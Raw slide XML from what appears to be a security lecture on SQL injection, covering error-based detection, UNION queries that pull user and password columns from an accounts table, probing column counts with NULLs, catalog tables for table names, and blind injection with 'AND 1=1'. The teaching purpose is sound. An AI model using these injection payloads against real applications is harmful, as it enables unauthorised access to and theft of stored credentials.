              <a:t>values</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> ('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>adam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>', 'test'); --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>and password= ''</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="60852288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5250" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Identifying SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="565251" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A SQL injection vulnerability can be identified in different ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Negative approach: special-meaning characters in the query will cause an error (for example: user=“ ’ ”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Positive approach: provide an expression that would NOT cause an error (for example: “17+5” instead of “22”, or a string concatenation, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>such as “‘ ’Foo” instead of “Foo” </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189506623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6525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6525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6525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7298" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The UNION Operator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567299" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The UNION operator is used to merge the results of two separate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>SELECT REPEAT('a',1) UNION SELECT REPEAT('b'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>'a'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>'b'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In a SQL injection attack this can be exploited to extract </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>additional information from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Original query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT id, name, price FROM products WHERE brand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>='$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>{b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>}'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modified query passing ${b}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="foo' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…":</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT id, name, price FROM products WHERE brand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNION SELECT user, pass, NULL FROM accounts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-- '</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In order for this attack to work the attacker has to know</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The structure of the query (number of parameters and types have to be compatible: NULL can be used if the type is not known)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The name of the table and columns   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138672960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672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6729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6729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6729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6729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6729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67299">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67299">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67299">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67299">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567299">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567299">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9346" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Determining Number and Type of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Query Parameters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="569347" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The number of columns in a query can be determined using progressively </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>longer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NULL columns until the correct query is returned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNION SELECT NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNION SELECT NULL, NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNION SELECT NULL, NULL, NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The type of columns can be be determined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> using a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>similar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>technique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>example, to determine the column that has a string type one would execute: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNION SELECT ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’, NULL, NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNION SELECT NULL, ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’, NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT NULL, NULL, ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205266659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693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6934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6934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6934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6934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6934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69347">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69347">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6934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1394" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Determining Table and Column Names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="571395" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To determine table and column names one has to rely on techniques that are database-specific</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Oracle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>user_objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> table one can extract information about the tables created for an application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>user_tab_column</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> table one can extract the names of the columns associated with a table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MS-SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> table one can extract information about the tables in the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>syscolumns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> table one can extract the names of the columns associated with a table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> tables one can extract information about the table names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> table one can extract the names of the columns associated with a table</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28200613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713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7139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7139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7139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7139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7139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7139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71395">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71395">
                                            <p:txEl>
                                              <p:charRg st="503" end="59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71395">
                                            <p:txEl>
                                              <p:charRg st="599" end="7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0740" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Blind SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140741" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A typical countermeasure is to prohibit the display of error messages. But, is this enough?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>No,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> a web application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>may still be vulnerable to blind SQL injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Example: a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>news site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Press releases are accessed with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pressRelease.jsp?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>=5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SQL query is created and sent to the database:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>select title, description FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pressReleases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> where id=5;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>All </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>error messages are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> filtered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>by the application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3531783476"/>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4074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4074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4074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4074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4074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40741">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4074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2788" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Blind SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142789" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>How can we inject statements into the application and exploit it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We do not receive feedback from the application so we can use a trial-and-error approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>First, we try to inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pressRelease.jsp?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>=5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The SQL query is created and sent to the database:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>select title, description FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pressReleases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> where id=5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If there is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SQL injection vulnerability, the same press release should be returned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If input is validated, id=5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>1=1 should be treated as the value</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="813769299"/>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4278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4278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4278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4278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4278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4278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4278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4836" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Blind SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1144837" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
